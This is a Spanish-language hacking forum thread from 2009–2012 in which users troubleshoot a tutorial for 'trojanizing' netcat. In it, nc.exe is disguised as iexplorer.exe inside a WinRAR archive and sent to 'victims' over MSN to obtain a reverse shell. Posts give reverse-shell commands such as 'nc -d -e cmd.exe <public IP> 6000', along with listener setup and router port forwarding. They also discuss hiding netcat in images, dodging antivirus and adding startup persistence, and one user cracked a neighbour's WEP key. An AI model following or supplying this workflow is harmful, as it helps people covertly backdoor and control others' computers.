3ro: en el cmd si pongo "nc" adelante de -vv -L -p 80 me tira como comando no reconosido bla bla bla.... si no lo pongo me aparece lo mismo de la imagen , lo de esperando respuesta del puerto 80 y eso.. esta bien asi?

4to: hay alguna forma de esconder el netcat en una jpg? por q tira mil preguntas sino pasarlo por msn...

5to: en el cmd del nc si pongo algo se me cierra ... antes de cerrarse salta "forwar host lookup failed: h_errno 11001: HOST_NO_FOUND" lei una respuesta a esto en la pag 2 y supuestamente tengo q descargarlo denuevo pero el link q da esta roto mepa :$ .... si me lo pueden pasar otra vez.. seria exelente...

6to: me tira ese error de win32 ... busco como dice WHK la versión 1.0 pero como q no la encuentro en la web.. en este post la dieron pero pide pass... T-T ... fijense si pueden hacer algo :) ... desde ya muchas gracias.!


Título: Re: Jugando con netcat
Publicado por: kamsky en 6 Septiembre 2009, 02:23 am
lo primero, escribe decentemente porque no entiendo ni la mitad de las cosas...

ahora, de lo que he conseguido entender:

1º- Si estás en una LAN, pones tu IP, si la conexión es desde internet hacia ti, la del router, pero debes de abrir y redirigir los puertos del router a tu ordenador

2º- Tiene que haber comunicación entre ambos, si no, como se lo vas a pasar... ?¿?¿

3º- tienes que estar en la carpeta donde está el ejecutable, y poner nc.exe, si no estás en ella, deberás de poner la ruta absoluta y no relativa

4º- Si, se puede,busca informacion que hay de sobra

5º- pues eso: HOST_NO_FOUND, más claro...

6º- búscala en google

7º- no mandes MP para decir que se te responda, el que lo crea conveniente lo hará, el que no no...

salu2


Título: Re: Jugando con netcat
Publicado por: pololo08 en 6 Septiembre 2009, 03:19 am
gracias y perdon por molestarte...no volvera a pasar


Título: Re: Jugando con netcat
Publicado por: irivator en 13 Septiembre 2009, 21:32 pm
Hola soy nuevo en esto y en el foro perdon si la preguntas estn repetidas es que no me qdan claro:

1.- Ya cree el "Carnada.exe" le puse mi ip y todo, lo he probado en mi pc y funciona bien pero adentro del rar dice iexplorer.exe.exe eso esta bien?? o deberia decir nc.exe o iexplore.exe??

2.- Yo se lo mande a una "victima" por msn lo acepto y todo  :xD pero cuando pongo nc -vv -L -p 80 esta bien escrito asi o deberia poner mi ip en algun lado?.
cuando pongo enter me dice ""nc" no se reconoce como un comando interno o externo, programa por lotes ejecutable."

ayuda porfavor grax de antemano  :-\


Título: Re: Jugando con netcat
Publicado por: kamsky en 13 Septiembre 2009, 22:35 pm
leete TODO el hilo, porque están respondidas tus preguntas


Título: Re: Jugando con netcat
Publicado por: irivator en 17 Septiembre 2009, 00:30 am
ya he leido como las primeras 15 pags y no encuntro respuestas xD y despues hablan de otras cosas que no tienen nada que ver con mis preguntas que alguien me responda plz u.u

1.- Ya cree el "Carnada.exe" le puse mi ip y todo, lo he probado en mi pc y funciona bien pero adentro del rar dice iexplorer.exe.exe eso esta bien?? o deberia decir nc.exe o iexplore.exe??

2.- Yo se lo mande a una "victima" por msn lo acepto y todo  :xD pero cuando pongo nc -vv -L -p 80 esta bien escrito asi o deberia poner mi ip en algun lado?.
cuando pongo enter me dice ""nc" no se reconoce como un comando interno o externo, programa por lotes ejecutable."

ayuda porfavor grax de antemano  :-\


Título: Re: Jugando con netcat
Publicado por: kamsky en 17 Septiembre 2009, 00:50 am
es el Servidor, no debes de poner nada más, pero la ELE, es en minúscula

No lo reconoce, porque no está en el Path del sistema...


Título: Re: Jugando con netcat
Publicado por: arkad2008 en 17 Septiembre 2009, 06:48 am
..


Título: Re: Jugando con netcat
Publicado por: kamsky en 17 Septiembre 2009, 20:50 pm
pues eso, no te deja, porque en el modem no tienes abiertos los puertos, entonces denega la conexión...

tienes que abrir el puerto que uses, y mediante NAT tunelizarlo a tu PC

prueba a conectarte al pueto 80, o al de telnet...si no puedes, haz una escaneo a ver que puertos tiene abiertos y ve probando con esos


Título: Re: Jugando con netcat
Publicado por: PitJunFan en 5 Octubre 2009, 18:36 pm
Hola que tal a todos los foreros del elhacker.net me presento ya que es mi primer post, antes que nada que buen tema se aventaron "Jugando con NetCat" ya que apenenas me estoy adentrando en esto del hacking y ya hice la 1er practica de Jugando con NetCat y si me a funcionado.

Solo que no pude ponerle Icono al NetCat porque tengo la version 1.1 y me mandaba el error de win32, y lo hice sin ponerle icono y todo funciono perfectamente.

Esto es lo que e podido hacer guiandome de la comunidad del www.elhacker.net, troyanizar el NetCat 1.1 (Si Icono), dejar a la escucha mi equipo (atacante)
enviar el netcat a la victima, obtener una shell remota, montar un server TFTP en mi equipo, poder subir y bajar archivos desde la shell remota con el TFTP, utilizar el NO-IP para mi equipo, el equipo victima es mi portatil que la tengo colgada de la red de mi vecino sacando la clave WEP con Wifislax 3.1, y mi equipo atacante es mi pc de escritorio y asi no le ago mal a nadie y es mas rapido hacer pruebas ya que tengo a la mano el equipo victima simplemente me interesa aprender.

Ahora ando viendo un tutorial que de como troyanizar el vnc para tener el escritorio remoto, gracias a toda la comunidad del elhacker.net por toda la informacion que nos han brindado.

kamsky podrias pasarnos el pass que tiene el archivo que nos dejaste del NetCat 1.0 para poderle poner el icono????

http://www.4shared.com/file/47149249/4df72120/netcat-10w.html (http://www.4shared.com/file/47149249/4df72120/netcat-10w.html)

Gracias por su ayuda y a seguir aprendiendo.

Saludos desde Mexico


Título: Re: Jugando con netcat
Publicado por: kamsky en 5 Octubre 2009, 19:11 pm
pues la verdad es que no me acuerdo... :¬¬ :silbar: :silbar:

pero recuerdo que simplemente busqué un poco por google hasta que me mandó a ese enlace, asi que... ;)


Título: Re: Jugando con netcat
Publicado por: lonbris8 en 7 Octubre 2009, 05:04 am
no encuentro el reshakek ya baje el netcat pero me falta el reskaker .. alguna ayudita


Título: Re: Jugando con netcat
Publicado por: kamsky en 7 Octubre 2009, 13:04 pm
después de una ardua y laboriosa búsqueda:

http://www.google.es/search?hl=es&lr=&rlz=1G1GGLQ_ESES300&ei=qnXMSpnOOJWe4QbrqMXyBQ&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=reshacker&spell=1


Título: Re: Jugando con netcat
Publicado por: lonbris8 en 7 Octubre 2009, 20:32 pm
saludos bueno hice todo como esta hasqui y voy muy bien haora tengo una duda cuendo abro el cmd y le pongo este codigo C:\WINDOWS>nc -vv -L -p 80  verda que se supone que en el cdm aparezca con ese nombre no mesale como yo lo chequeo haber si esta corecto alguna ayudita se lo agradecería..


Título: Re: Jugando con netcat
Publicado por: sharkyman001 en 11 Octubre 2009, 07:12 am
Exelente manual gracias


Título: Re: Jugando con netcat
Publicado por: softdates en 11 Octubre 2009, 07:32 am
http://www.usuarios.lycos.es/orlyyan/  netcat es un programa ya obsoleto pero para los melancolicos entren ahi. veran tendran cosas interesantes


PD:

Moderador puedes poner mi enlace como referencia?


Título: Re: Jugando con netcat
Publicado por: kamsky en 12 Octubre 2009, 22:13 pm
netcat obsoleto?? :huh: :huh: :huh: :huh: , me parece que estás confundido...


Título: Re: Jugando con netcat
Publicado por: Leon8086x en 23 Octubre 2009, 09:06 am
Buenas se deberia recopilar este material en un word o pdf yo lo estoy intentando
pero como no soy experto en el tema se me esta haciendo lento y complejo

Pero seamos sin0s este post no tiene desperdicio.


Título: Re: Jugando con netcat
Publicado por: Lavacaloca en 20 Mayo 2011, 23:07 pm
Al fin página 42!!!! Después de 3 interrumpidos días conseguí leer todo el post, y aún así no puedo solucionar mi problema (aquí va):

Mi problema es el siguiente: el netcat no me funciona. Lo que pasa es que yo hago todo lo de los tutoriales , y a la hora de mandárselo a una víctima, aún cuando abre el archivo con el nc + un .bat ( reverse shell), mi netcat se queda en "listening" y no se recibe la conexión. Ya probé con reverse shell y con pipes , pero no funcionan.

Supongo que tengo que abrir un puerto , pero ya lo intente en el Firewall, y a pesar de que esta "creado" y "activado" no funciona. Escanee mi Ip en busca de puertos,y tenias 3, los cuales aun que los ponga en el nc no me funciona.

Les agradecería que me puedan ayudar.

PD: tengo un módem Huawei echolife hg520c, supongo que no debo abrir los puertos por el módem , ¿o si? (es de  speedy)


Título: Re: Jugando con netcat
Publicado por: dec0 en 6 Junio 2011, 13:51 pm
Saludos a todos, la web para bajar netcat para windows no está disponible.

Alguien sabe donde me lo puedo bajar?

Gracias!!



Título: Re: Jugando con netcat
Publicado por: dec0 en 6 Junio 2011, 14:48 pm
Disculpen las molestias pero por suerte encontre un post en que venía estas herramientas aquí en el foro!!.

Muchas gracias!! Ya está solucionado.


Título: Re: Jugando con netcat
Publicado por: carlipus en 14 Junio 2011, 21:32 pm
cuando intento troyanizar netcat con windows 7 no me deja el winrar. me da un error, a alguien más le ha pasado?


Título: Re: Jugando con netcat
Publicado por: WHK en 15 Junio 2011, 09:05 am
Al fin página 42!!!! Después de 3 interrumpidos días conseguí leer todo el post, y aún así no puedo solucionar mi problema (aquí va):

Mi problema es el siguiente: el netcat no me funciona. Lo que pasa es que yo hago todo lo de los tutoriales , y a la hora de mandárselo a una víctima, aún cuando abre el archivo con el nc + un .bat ( reverse shell), mi netcat se queda en "listening" y no se recibe la conexión. Ya probé con reverse shell y con pipes , pero no funcionan.

Supongo que tengo que abrir un puerto , pero ya lo intente en el Firewall, y a pesar de que esta "creado" y "activado" no funciona. Escanee mi Ip en busca de puertos,y tenias 3, los cuales aun que los ponga en el nc no me funciona.

Les agradecería que me puedan ayudar.

PD: tengo un módem Huawei echolife hg520c, supongo que no debo abrir los puertos por el módem , ¿o si? (es de  speedy)

Recuerda que a estas alturas netcat es detectado por casi todo antivirus, lo mas probable es que la otra pc haya tenido un antivirus activo.
De todas formas intenta ver cual es tu ip, por ejemplo en cualesmiip.com y después copias esa ip y pones en tu explorador http://laipquemesalió:puertodelnetcat/ y si no conecta es tu modem y si conecta es l antivirus de la otra persona.

Saludos a todos, la web para bajar netcat para windows no está disponible.

Alguien sabe donde me lo puedo bajar?

Gracias!!

Acá va:
http://foro.elhacker.net/hacking_basico/descargar_netcat_cryptcat_radmin_12_extension_creator_etc-t304990.0.html
El de megaupload está funcionando.

Citar
uando intento troyanizar netcat con windows 7 no me deja el winrar. me da un error, a alguien más le ha pasado?
Yo tengo una pc con windows 7 y winrar mas netcat me funcionan super bién. Verifica que no tengas tu antivirus activo o busca una version mas reciente de winrar.

Tengo todos los respaldos de archivos, documentos y videos explicativos, lo acabo de subir todo acá:
http://tinyurl.com/3duv6qh


Título: Re: Jugando con netcat
Publicado por: carlipus en 15 Junio 2011, 09:50 am
me pone que el archivo tiene un formato desconocido o esta dañado cuanco intento crearlo con el winrar. tengo av desactivado


Título: Re: Jugando con netcat
Publicado por: WHK en 15 Junio 2011, 09:56 am
Eso pasa cuando el archivo está bloqueado, tu antivirus ya se lo comió, intenta bajarlo otraves.


Título: Re: Jugando con netcat
Publicado por: carlipus en 15 Junio 2011, 10:31 am
nada lo intente bajarlo otra vez con el av norton desactivado, y sigo teniendo el mismo problema :S


Título: Re: Jugando con netcat
Publicado por: carlipus en 24 Junio 2011, 13:57 pm
ya consegui hacerlo, el problema es que no puedo hacer un reverse shell, tengo el firewall desactivado, firewall de router desactivado, y puerto 6000 abierto en router y no conecta desde exterior...:S

alguna sugerencia?


Título: Re: Jugando con netcat
Publicado por: zhyzura en 25 Junio 2011, 00:06 am
 si quieres conectarte desde el exterior al interior de tu red entonces no tienes que hacer una reverse shell, sino mas bien una directa.


igual si sigues teniendo problemas podrias explicar los pasos que hacer y el comando que ejecutas y con gusto te ayudo :)


saludos


Título: Re: Jugando con netcat
Publicado por: carlipus en 26 Junio 2011, 16:49 pm
Lo hago desde mi pc los 2 comandos.

En una ventana msdos pongo nc -vv -L -p 6000

En la otra nc -d -e cmd.exe miipPUBLICA 6000

Deberia conectar, no?

Si en cambio hago el mismo proceso pero en vez de ip publica, la ip privada(192.168.xxxx) si que conecta.

Por eso creo que aunque lo probara desde otro ordenador no conectaria el exterior a mi netcat a la escucha.




Título: Re: Jugando con netcat
Publicado por: zhyzura en 27 Junio 2011, 20:17 pm
 pregunta...


ya mapeaste(o redireccionaste) los puertos de tu router??


cuando usas la ip de tu red te funciona por que estas conectado directamente, pero al hacerlo atravez de tu ip publica lo que haces es conectarte a quien tiene dicha ip que en este caso no es tu equipo sino mas bien el router que te da la conexion a internet(de alli la razon de tener que redireccionar los puertos en tu router) para que cuando tu router reciba una peticion en el puerto 6000 la envie a tu equipo.


saludos


Título: Re: Jugando con netcat
Publicado por: carlipus en 1 Julio 2011, 18:38 pm
Si claro que lo mapee...pero sigue sin funcionar....no se que puede ser


Título: Re: Jugando con netcat
Publicado por: ©๖ۜмaтυтaησ™ en 1 Julio 2011, 22:06 pm
Muy bien explicad me gusto mucho  ;)


Título: Re: Jugando con netcat
Publicado por: zcirokoko4566 en 11 Julio 2011, 20:44 pm
Ayuda...


Título: Re: Jugando con netcat
Publicado por: zcirokoko4566 en 11 Julio 2011, 20:44 pm
Saludos...

tengo un problema con el NetCat

sucede que no puedo conectar a una shell con IP privada..

la sintaxis seria:

mi PC:

nc -vvlp 12345
"Modo escucha..."

PC victima:

nc -g (ip-publica) (ip privada) (12345)

pero no conecta..

son nuevo en esto...

alguna solucion... :-X


Título: AYUDA Jugando con netcat parte 1
Publicado por: bravo1979 en 4 Septiembre 2011, 18:40 pm
Hola como estas, disculpa pero necesito que me ayudes recien empiezo con esto y no quiero quedarme a medias, estoy haciendo tu ejercicio de la parte 1 y tengo unas dudas.

termine con exito lo del winrar, pero no entiendo eso de crear ahora el cliente, lo que ejecutas es el D.O.S o es el nc? por q no me sale si ejecuto el D.O.S con la raiz de windows y hago esa sentencia me sale q no se reconoce como un comando interno ni externo y si lo hago del nc q creo q no lo haces no sucede nada.

puedes explicarmelo por favor? y podrias subir nuevamente el video q ya no funciona,.

gracias espero tu pronta respuesta, quisiera resolver esto para seguir con los otros ejercicios t dejo mi email es oscar_ch.b@hotmail.com ;-)


Título: Re: Jugando con netcat
Publicado por: darckz en 10 Diciembre 2011, 05:07 am
MUY BUENO QUE LASTIMA QUE TENGA QUE VER LAS IMAGENES POR SEPARADO :-\


Título: Re: Jugando con netcat
Publicado por: WHK en 10 Diciembre 2011, 14:37 pm
MUY BUENO QUE LASTIMA QUE TENGA QUE VER LAS IMAGENES POR SEPARADO :-\

Acabo de modificar los enlaces de las imágenes, ahora si se pueden ver nuevamente :)

Saludos.


Título: Re: Jugando con netcat
Publicado por: tornadeitor en 11 Diciembre 2011, 19:48 pm
Hola, estoy iniciándome en este programa y tenía una duda que espero puedan resolverme:

¿Hay algún método para modificar el registro de un Windows Vista y Seven y así que se ejecute el NetCat en cada inicio del sistema? He visto que para XP se puede hacer un batch, pero este no funciona en Vista y Seven ya que estos piden permiso de Administrador. He estado buscando información sobre ello pero no encuentro nada por Google.

Un saludo.


Título: Re: Jugando con netcat
Publicado por: kAl35K1Ng en 28 Diciembre 2011, 20:14 pm
tengo el mismo problema que carlipus, antes de todo, estoi ausando puerto 80 y 25, por lo tanto en teoria no tendria que abrir los puertos pero aun asi los abro y los compruevo con http://www.canyouseeme.org/ y me sale succesfull los dos puertos asi que creo que tema de puertos no es el problema.
Aora explico mas detallado mi problema, he echo el 1º ejerciciion aunk no exactamente, e cojido variaciones e metido un bat y e echo otras cosas, en direccion local me sale todo perfecto y con la direccion publica se me queda escuchando los puertos, no se si el problema es porque escucho los puertos y los abro con el mismo pc pero k tengan claro k problema de antivirus no es pork no tengo ^^, aver si pueden ayudarme, pork e leido k ai k acer algo con el no-ip o algo de eso..
gracias de antemano, y buen tuto


Título: Re: Jugando con netcat
Publicado por: kitell en 12 Febrero 2012, 16:37 pm
Hola mira estuve haciendo todo los pasos y me sale el tipico error h_errno 11001: HOST_NOT_FOUND.

A la solucion, no encuentro otro netcat por la red.




Despues, lo abri yo mismo para probarlo y ahora cada vez que enciendo el pc sale la ventana de cmd y se cierra rapido.

Entre en el registro, run. pero no sale las entradas que yo puse.

Donde se guardo eso para que cada vez que encienda salte el programa?

Edito: la ventada ms dos que salia estaba abriendome la ruta: C:\users\NOMBRE\update\iexplorer.exe (el netcat)

Lo elimine y ya no sale mas la ventana.


Título: Re: Jugando con netcat
Publicado por: Lepattan en 13 Febrero 2012, 19:36 pm
Eso es el caso de W2, pero como algunos habremos, ¿qué pasa con la sintáxis para usuarios Linux, llámese Ubuntu, Fedora, o cualquier distro?